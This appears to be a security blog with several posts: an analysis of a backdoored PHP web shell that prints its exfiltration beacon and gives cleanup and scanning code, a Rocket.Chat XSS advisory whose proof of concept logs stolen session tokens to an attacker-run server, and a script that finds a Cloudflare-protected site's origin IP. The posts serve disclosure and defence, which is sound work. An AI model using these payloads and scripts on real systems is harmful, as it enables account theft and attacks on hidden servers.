Tuesday, August 18, 2020

How Hackers Become Victims: Backdoor in PHP web shells

I decided to decode a PHP web shell that had been encoded with the Fopo online encoder. It is called "ATTACK SHELL PRiV9" or "K2ll33d Shell 2019" and belongs to "r00t.info".

PHP web shell:

Encoded source:

What we found inside may interest you.

As you can see, it contains a backdoor that copies itself as newsr.php into every directory of the website and sends the shell's location and details to the address "http://r00t.info/ccb.js" and to the mailbox "byhero44@gmail.com". The shell's password is "a4cd2905b660e8b1bc73a7c4571252da", which is an MD5 hash (MD5 is a hash, not encryption, so the original password is not stored anywhere in the file).

ccb.js contains a one-line beacon: it creates an image whose source is a URL on expoilt.com with the current page address appended, so every page that loads it reports the shell's location to that server:

a=new/**/Image();a.src='http://www.expoilt.com/yaz.php?a='+escape(location.href);

I changed all http to hxxp to prevent execution and harm to your system, so if you want to run it you need to restore the original values.

Other names and addresses found in the decoded source are:

Turkey Cyber Army team

https://expoilt.com/yaz.php?a=

http://r00t.info/txt/lamer.txt

k2ll33d

Indoxploit Shell

Sym Bypass 403 Shell

Berandal Indoxploit Shell V2.1

Premium Wso Shell

Whmcs Killer

Mobile Shell V.05 2018 Private

K2ll33d Shell

3turr ~ Sh311

Server V-8 Attack Shell

Bypass shell

Wordpress Mass Change Password 2019

Smevk_pathan Shell V3 Bypass Shell

Leaf Php Mailer V.2.7

Bloodsecurity Bypass Shell

Anon Priv9 Shell

Wso Shell

R00t.info Priv7 Shell New 2016

Wso Shell 4.2.2

G5 Private Bypass Shell


If you have used this shell, you need to know that your entire website is infected, not just the file you uploaded.

The steps to clean it:

Look for "newsr.php" files in every directory of your website and remove them.

If you are using Linux, use this command (the -type f guard stops it from recursively deleting a directory that merely shares the name):

find / -type f -name newsr.php -exec rm -f {} \;

Also, delete the shell file you uploaded completely.

And also delete the CGI shell files that the PHP web shell created.
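To check a site for this particular infection before deleting anything, here is an added example (my own, not code from the post or from the shell's author) that walks a web root, flags every file named newsr.php and every script containing the indicators decoded above (the r00t.info/ccb.js beacon, the expoilt.com callback, the byhero44 mailbox and the MD5 password hash). It builds a small constructed sample tree so it runs offline; point scan_webroot() at your real document root instead. It reports rather than deletes, so you can review each hit first.

```python
import tempfile
from pathlib import Path

# Indicators taken from the decoded shell described above.
DROPPED_FILENAME = "newsr.php"
IOC_STRINGS = (
    b"r00t.info/ccb.js",
    b"expoilt.com/yaz.php",
    b"byhero44@gmail.com",
    b"a4cd2905b660e8b1bc73a7c4571252da",
)
# Only text-like files are read; images and archives are skipped to keep the scan fast.
SCAN_SUFFIXES = {".php", ".phtml", ".php5", ".inc", ".js", ".txt", ".cgi", ".pl"}


def scan_webroot(root):
    """Walk root and return a sorted list of (relative_path, reason) for
    every dropped copy of the backdoor and every file carrying one of the
    known indicator strings."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = path.relative_to(root).as_posix()
        if path.name == DROPPED_FILENAME:
            findings.append((rel, "dropped copy of the backdoor"))
            continue
        if path.suffix.lower() not in SCAN_SUFFIXES:
            continue
        try:
            data = path.read_bytes()
        except OSError:
            continue  # unreadable file: skip it rather than abort the whole scan
        hits = [ioc.decode() for ioc in IOC_STRINGS if ioc in data]
        if hits:
            findings.append((rel, "ioc:" + ",".join(hits)))
    return sorted(findings)


def build_demo_webroot():
    """Constructed sample document root (not a real site): one clean file,
    one dropped newsr.php, one stand-in for the uploaded shell that carries
    the mail and beacon indicators, and one binary that must be skipped."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "index.php").write_text("<?php echo 'hello'; ?>\n")
    (root / "wp-content").mkdir()
    (root / "wp-content" / "newsr.php").write_text("<?php /* dropped copy */ ?>\n")
    (root / "uploads").mkdir()
    (root / "uploads" / "shell.php").write_text(
        "<?php // constructed stand-in for the uploaded web shell\n"
        "mail('byhero44@gmail.com', 'shell', $_SERVER['HTTP_HOST']);\n"
        "echo '<script src=\"hxxp://r00t.info/ccb.js\"></script>';\n"
    )
    (root / "uploads" / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0")
    return root


if __name__ == "__main__":
    demo = build_demo_webroot()
    for rel_path, reason in scan_webroot(demo):
        print(f"{rel_path}: {reason}")
```

The indicator match is a plain byte search, so it also catches copies where the URLs were defanged to hxxp, as in this post; the file name check runs first because a dropped newsr.php is suspicious regardless of its content.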

You can find the full decoded source code at https://pastebin.com/bmrrDeAb



Sunday, June 7, 2020

OWASP JoomScan Project in Pentestmag

Our article was published in Pentestmag.




OWASP JoomScan Project
by Mohammad Reza Espargham, Ali Razmjoo, and Ehsan Nezami
JoomScan does not aim only at testing for different vulnerabilities and simulating attacks: the process always begins with information gathering and proceeds step by step following ethical hacking techniques. The information-gathering phase is not limited to the web application; it also covers the web server and domain, as well as misconfigurations, human errors, and other possible risks in the product.

https://lnkd.in/dcwRNvD
Other contributors to the edition: Valerio Alessandroni, Marlene Ladendorff, Chuck Easttom, Daniel Benicio F Alves, Kavya Pearlman, Alex Halfin, Vinícius Vieira, Mostafa Mahmoud, Mohammad Reza Espargham, Ali Razmjoo, Ehsan Nezami, Ofer Tirosh, and Franciny S.

Wednesday, October 2, 2019

Rocket.Chat Cross Site Scripting CVE-2019-17220

Rocket.Chat versions prior to 2.1.0 suffer from a cross-site scripting vulnerability.

As I found out, the service has a security problem that leads to the disclosure of user information.

Packet Storm
Mitre CVE
NIST
Exploit-DB



# Title: Rocket.Chat 2.1.0 - Cross-Site Scripting
# Author: 3H34N
# Date: 2019-10-22
# Product: Rocket.Chat
# Vendor: https://rocket.chat/
# Vulnerable Version(s): Rocket.Chat < 2.1.0
# CVE: CVE-2019-17220
# Special Thanks : Ali razmjoo, Mohammad Reza Espargham (@rezesp)

1. Create l33t.php on a web server you control; it appends whatever arrives in the leet parameter to logs.txt:


<?php
$output = fopen("logs.txt", "a+") or die("WTF? o.O");
$leet = $_GET['leet']."\n\n";
fwrite($output, $leet);
fclose($output);
?>

2. Open a chat session
3. Send the payload with your web server's URL:


![title](http://10.10.1.5/l33t.php?leet=+`{}token`)

4. The token is written to logs.txt when the target views your message.
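The payload above relies on the client expanding the `{}token` fragment in the image URL before fetching it, so the token lands in the request your server logs. As an added example (mine, not Rocket.Chat code and not part of the advisory), here is detection logic a defender can run over stored or in-flight messages: it pulls every Markdown image URL out of a message and rejects any that carries template characters, uses a non-HTTP scheme, or points at a host outside an allow-list. The sample messages and the trusted host chat.example.org are constructed for the example.

```python
import re
from urllib.parse import urlsplit

# Markdown image syntax: ![alt](url). The URL group stops at the closing paren.
IMAGE_RE = re.compile(r"!\[[^\]]*\]\(([^)]+)\)")
# Backticks and braces never belong in an image URL, but they are exactly what
# the template-style payload above needs.
TEMPLATE_CHARS = frozenset("`{}")
SAFE_SCHEMES = ("http", "https")


def extract_image_urls(message):
    """Return every Markdown image URL in a message, in order."""
    return IMAGE_RE.findall(message)


def classify_image_url(url, trusted_hosts):
    """Return 'ok', 'template-injection', 'bad-scheme' or 'external-host'."""
    if TEMPLATE_CHARS & set(url):
        return "template-injection"
    parts = urlsplit(url)
    if parts.scheme not in SAFE_SCHEMES:
        return "bad-scheme"
    if parts.hostname not in trusted_hosts:
        return "external-host"
    return "ok"


def scan_messages(messages, trusted_hosts=frozenset({"chat.example.org"})):
    """Return (message_index, url, verdict) for every image URL that is not 'ok'."""
    findings = []
    for index, message in enumerate(messages):
        for url in extract_image_urls(message):
            verdict = classify_image_url(url, trusted_hosts)
            if verdict != "ok":
                findings.append((index, url, verdict))
    return findings


# Constructed sample messages. The first has the shape of the advisory's
# payload; the rest are a benign internal image, plain text, a non-HTTP
# scheme and an image hosted off-site.
SAMPLE_MESSAGES = [
    "![title](http://10.10.1.5/l33t.php?leet=+`{}token`)",
    "![logo](https://chat.example.org/avatar/alice.png)",
    "no image here, just text",
    "![x](javascript:alert%281%29)",
    "![tracker](https://cdn.example.net/pixel.png)",
]

if __name__ == "__main__":
    for index, url, verdict in scan_messages(SAMPLE_MESSAGES):
        print(f"message {index}: {verdict}: {url}")
```

The template-character check runs before URL parsing on purpose: a payload only needs the raw characters to reach the client, so the verdict must not depend on how the URL parser happens to tokenize them. The external-host rule is the broader fix, since any off-site image is an exfiltration channel for whatever the client puts in the request.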

Friday, April 12, 2019

OWASP Honeypot

In our first test of the OWASP Honeypot with Ali Razmjoo, I have to say that, among all the attacks we are receiving, the Russian ones are smarter and more effective.







Black Hat Asia 2019

Our OWASP Nettacker: Automated Penetration Testing Framework has been accepted for Black Hat Asia Arsenal 2019.

https://www.blackhat.com/asia-19/arsenal/schedule/index.html#owasp-nettacker-automated-penetration-testing-framework-14336


The OWASP Nettacker project was created to automate information gathering and vulnerability scanning, and eventually to generate a report for networks, covering services, bugs, vulnerabilities, misconfigurations, and other information. The software uses TCP SYN, ACK, ICMP and many other protocols to detect and bypass firewall/IDS/IPS devices. Its method for discovering protected services and devices such as SCADA gives it an edge over other scanners.




The Black Hat photographer has uploaded some pictures to Flickr; you can check them out, here: https://www.flickr.com/photos/blackhatevents/albums/72157707843897024



Saturday, November 10, 2018

Bypass Cloudflare To Get Real IP Address

What is CloudFlare

CloudFlare is one of the fastest-growing CDN providers, with free and premium plans to accelerate, optimize and secure websites. More than 2,000,000 web properties are powered by CloudFlare, and I use their service too. If you are already using CloudFlare, you may have noticed that the IP address returned by a DNS lookup is a CloudFlare address rather than your own server's.

How this script works

This script is designed to discover the origin IP of a server behind Cloudflare by probing the domain's name-server hostnames. It only works for domains that run their own (private) name servers on the origin host, because Cloudflare proxies web traffic but a self-hosted name server still answers from the real address. The script tries a list of default private name-server hostnames and, for every one that resolves, reports the address it points to, which is the origin server's real IP.

Example NS


ns1, ns2, ns3, ns4, primary, host1, host2, masterdns, slavedns, dns1, dns2, master, slave, node1, node2

Ping Test
Pinging the domain shows the Cloudflare edge IP, not the origin:

C:\Users\root>ping cafeigapp.com

Pinging cafeigapp.com [172.64.197.10] with 32 bytes of data:
Reply from 172.64.197.10: bytes=32 time=153ms TTL=60
Reply from 172.64.197.10: bytes=32 time=150ms TTL=60
Reply from 172.64.197.10: bytes=32 time=149ms TTL=60
Reply from 172.64.197.10: bytes=32 time=155ms TTL=60

Ping statistics for 172.64.197.10:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 149ms, Maximum = 155ms, Average = 151ms

CloudFlare Bypasser script result: the script detected the origin IP by scanning the name-server hostnames on ports 80 and 53; the real IP is 144.76.174.208.


Enter your domain: cafeigapp.com
Starting...

[+] Open        ns1.cafeigapp.com                                 53    144.76.174.208
[+] Open        ns1.cafeigapp.com                                 80    144.76.174.208
[+] Open        ns2.cafeigapp.com                                 53    144.76.174.208
[+] Open        ns2.cafeigapp.com                                 80    144.76.174.208
[-] Hostname could not be resolved.
[-] Hostname could not be resolved.
[-] Hostname could not be resolved.
[-] Hostname could not be resolved.

[*] Finished!

Cloudflare Bypasser Script:

Download script 


'''
    File name: Bypass Cloudflare To Get Real IP Address
    Author: Dariush Nasirpour (Net.Edit0r)
    Date created: 11/10/2018
    Web: http://nasirpour.info
    Special Thanks to Ehsan Nezami
'''

import socket

# One second per connect attempt keeps the scan short on filtered hosts.
socket.setdefaulttimeout(1)

domain = input("Enter your domain: ")

try:
    print("Starting...\n")
    # Common hostnames for self-hosted name servers; a domain that runs its own
    # NS on the origin box usually exposes that box's real address here.
    dns = ["ns1.", "ns2.", "ns3.", "ns4.", "primary.", "host1.", "host2.", "masterdns.", "slavedns.", "dns1.", "dns2.",
           "master.", "slave.", "node1.", "node2."]
    for dns_name in dns:
        remoteServerIP = dns_name + domain
        # Resolve once per hostname; an unresolvable name is reported once, not once per port.
        try:
            IP = socket.gethostbyname(remoteServerIP)
        except socket.gaierror:
            print("[-] Hostname could not be resolved.")
            continue
        for port in [53, 80]:
            sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            try:
                result = sock.connect_ex((IP, port))
                if result == 0:
                    print("[+] Open\t{:<50}{:<3}\t{}".format(remoteServerIP, port, IP))
            except socket.error:
                print("[-] Couldn't connect to server")
            finally:
                sock.close()
    print("\n[*] Finished!")
except KeyboardInterrupt:
    print("You pressed Ctrl+C")
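The script above treats every hostname that resolves as a hit, but if a guessed name server is itself proxied by Cloudflare, the address it prints is still an edge address. As an added example (mine, not the script author's code), here is the same hostname enumeration with each resolved address checked against Cloudflare's published IPv4 ranges, so only addresses outside them are reported as origin candidates. The resolver is passed in as a function so the code runs offline here against a constructed answer table (the cafeigapp.com names and addresses mirror the sample run above, and ns3 is an invented proxied name); pass socket.gethostbyname for a live run. The range list is the one Cloudflare published at the time of writing; refresh it from https://www.cloudflare.com/ips-v4 before relying on it.

```python
import ipaddress
import socket

# Cloudflare's published IPv4 ranges (https://www.cloudflare.com/ips-v4) at the
# time of writing; refresh before use, the list does change.
CLOUDFLARE_IPV4 = [ipaddress.ip_network(n) for n in (
    "173.245.48.0/20", "103.21.244.0/22", "103.22.200.0/22", "103.31.4.0/22",
    "141.101.64.0/18", "108.162.192.0/18", "190.93.240.0/20", "188.114.96.0/20",
    "197.234.240.0/22", "198.41.128.0/17", "162.158.0.0/15", "104.16.0.0/13",
    "104.24.0.0/14", "172.64.0.0/13", "131.0.72.0/22",
)]

# Same guess list as the script above.
NS_PREFIXES = ["ns1", "ns2", "ns3", "ns4", "primary", "host1", "host2",
               "masterdns", "slavedns", "dns1", "dns2", "master", "slave",
               "node1", "node2"]


def is_cloudflare(ip):
    """True if ip falls inside one of Cloudflare's published ranges."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in CLOUDFLARE_IPV4)


def candidate_origins(domain, resolve=socket.gethostbyname):
    """Resolve each guessed name-server hostname and return (hostname, ip)
    for those that resolve to an address outside Cloudflare's ranges.
    resolve(hostname) must return a dotted IPv4 string or raise socket.gaierror."""
    found = []
    for prefix in NS_PREFIXES:
        hostname = f"{prefix}.{domain}"
        try:
            ip = resolve(hostname)
        except socket.gaierror:
            continue
        if not is_cloudflare(ip):
            found.append((hostname, ip))
    return found


# Constructed answer table standing in for DNS, so the example runs offline.
DEMO_ANSWERS = {
    "cafeigapp.com": "172.64.197.10",        # the proxied apex from the ping above
    "ns1.cafeigapp.com": "144.76.174.208",   # self-hosted NS on the origin box
    "ns2.cafeigapp.com": "144.76.174.208",
    "ns3.cafeigapp.com": "104.16.8.8",       # invented: a guessed name that is itself proxied
}


def demo_resolve(hostname):
    """Stand-in for socket.gethostbyname backed by the constructed table."""
    try:
        return DEMO_ANSWERS[hostname]
    except KeyError:
        raise socket.gaierror(f"{hostname}: Name or service not known")


if __name__ == "__main__":
    print("apex is Cloudflare:", is_cloudflare(DEMO_ANSWERS["cafeigapp.com"]))
    for hostname, ip in candidate_origins("cafeigapp.com", demo_resolve):
        print(f"[+] {hostname:<30} {ip}")
```

A candidate that passes this filter still needs confirming: connect to it on port 80 or 443 with the Host header set to the domain and compare the response with what the Cloudflare front end serves. An address outside Cloudflare's ranges might belong to a separate DNS host rather than the web origin.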